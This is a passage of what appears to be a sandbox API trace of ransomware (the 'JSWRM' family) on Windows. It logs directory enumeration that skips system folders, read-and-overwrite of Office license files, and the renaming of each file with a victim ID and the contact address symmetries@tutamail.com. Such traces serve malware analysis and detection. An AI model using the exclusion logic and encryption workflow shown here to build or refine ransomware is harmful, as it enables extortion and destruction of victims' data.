(lpString1="OutlookVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0106.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241010, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0106.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241358, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0106.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0106.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0106.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.748] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11586) returned 1 [0106.748] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.748] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.753] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.753] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.753] CloseHandle (hObject=0x45c) returned 1 [0106.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0106.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0106.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0106.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0106.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0106.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.753] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0106.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0106.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0106.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0106.754] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7f578e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7f578e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe803c6f1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ddb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookVL_MAK-ul-phn.xrm-ms", cAlternateFileName="OUF9A0~1.XRM")) returned 1 [0106.754] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0106.755] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0106.755] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0106.755] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0106.755] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0106.755] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0106.755] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0106.755] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.755] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0106.755] lstrcmpiW (lpString1="OutlookVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0106.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0106.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240f48, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0106.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241358, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0106.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0106.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0106.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.756] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19931) returned 1 [0106.756] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0106.756] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.762] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.762] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.762] CloseHandle (hObject=0x45c) returned 1 [0106.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0106.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0106.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0106.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0106.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0106.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0106.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.762] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0106.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0106.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0106.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0106.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0106.763] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8206352, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8206352, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe82eb133, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bc3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="PE4C99~1.XRM")) returned 1 [0106.763] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0106.763] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0106.764] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0106.764] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0106.764] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0106.764] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned 1 [0106.764] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.764] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.764] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.764] lstrcmpiW (lpString1="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned 1 [0106.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0106.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0106.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0106.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0106.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0106.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0106.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0106.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.765] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11203) returned 1 [0106.766] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0106.766] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0106.769] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.769] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0106.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.769] CloseHandle (hObject=0x45c) returned 1 [0106.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0106.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0106.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0106.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0106.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0106.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0106.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.769] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0106.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0106.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0106.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.770] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8206352, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8206352, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe83113f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5285, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalDemoR_BypassTrial180-ppd.xrm-ms", 